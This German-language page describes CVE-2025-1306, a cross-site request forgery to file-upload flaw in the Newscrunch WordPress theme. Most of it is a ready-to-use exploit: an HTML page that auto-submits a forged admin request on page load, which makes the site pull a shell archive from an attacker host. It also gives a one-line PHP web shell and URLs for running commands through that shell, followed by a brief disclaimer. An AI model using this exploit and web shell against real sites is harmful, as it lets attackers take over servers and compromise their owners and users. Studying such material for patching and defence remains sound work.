
Newscrunch <= 1.8.4 - Site-übergreifende Anfragenfälschung zu beliebigem Datei-Upload
Dieser Exploit zielt auf eine Cross-Site Request Forgery (CSRF) zu beliebigem Datei-Upload-Schwachstelle (CVE-2025-1306) im Newscrunch WordPress-Theme ab. Aufgrund fehlender Nonce-Überprüfung in der Funktion newscrunch_install_and_activate_plugin() kann ein nicht authentifizierter Angreifer einen eingeloggten Administrator dazu verleiten, beliebige Dateien auf den Server hochzuladen, was zu Remote Code Execution (RCE) führt.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:HAusnutzbarkeit: Erfordert, dass ein Administrator einen manipulierten bösartigen Link besucht.
Dieser Exploit zwingt einen authentifizierten Administrator, einen CSRF-Angriff auszuführen, der eine bösartige ZIP-Datei mit einer Web-Shell hochlädt.
<!DOCTYPE html>
<html>
<head>
<title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
<h2>Click anywhere to load content...</h2>
<script>
function sendExploit() {
var form = document.createElement("form");
form.method = "POST";
form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";
var input = document.createElement("input");
input.type = "hidden";
input.name = "plugin_url";
input.value = "http://attacker.com/shell.zip";
form.appendChild(input);
document.body.appendChild(form);
form.submit();
}
window.onload = function() {
sendExploit();
};
</script>
</body>
</html>
📌 Ersetzen:
http://target.com/ durch die verwundbare WordPress-Seitehttp://attacker.com/shell.zip durch eine bösartige ZIP-Nutzlast mit einer Web-Shell.<?php system($_GET['cmd']); ?>
📌 Nach erfolgreicher Ausnutzung greifen Sie auf die Shell zu:
http://target.com/wp-content/plugins/shell.php?cmd=whoami
http://target.com/wp-content/plugins/shell.php?cmd=ls
Dieses Tool dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Die unbefugte Ausnutzung von Schwachstellen ist illegal und strafbar. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Verwenden Sie es verantwortungsbewusst.